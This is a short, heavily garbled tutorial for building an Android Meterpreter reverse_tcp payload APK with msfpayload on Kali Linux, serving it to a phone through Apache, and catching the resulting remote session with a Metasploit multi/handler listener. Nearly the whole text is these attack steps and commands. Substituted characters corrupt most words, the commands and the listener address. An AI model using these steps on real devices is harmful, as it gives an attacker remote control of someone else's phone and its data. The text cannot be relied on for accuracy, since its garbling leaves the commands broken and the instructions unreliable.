1.
In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=[Link] L!O"T=#### " $
[Link]%
replace LHOST with your kali box ip
. tran!"er the [Link] to your android de#ice, $u!t download in the android de#ice !o not in!tall.
%or tran!"erin& the [Link] you can create !hared "older in kali'! location, (#ar(www( , you need to
!tart apache !er#ice, copy the [Link] to thi! "older and brow!e thi! location in androide de#ice.
). In Kali, !tart *eta!ploit "rom the menu or by typin& +m!"con!ole, in a Terminal window.
-. Once *eta!ploit !tart!, type in the "ollowin& to create a li!tener:
u!e exploit(multi(handler
!et payload android(meterpreter(re#er![Link]
!et lho!t 1/.101.1.10 2enter your Kali I3 addre!!4
!et lport ----
exploit
once the payload handler i! ready, &o to the android de#ice and in!tall the [Link], a"ter in!tallation
open the application. 5ou can !ee a meterpreter !e!!ion !tarted. 3lea!e re"er the below !creen
!hot!...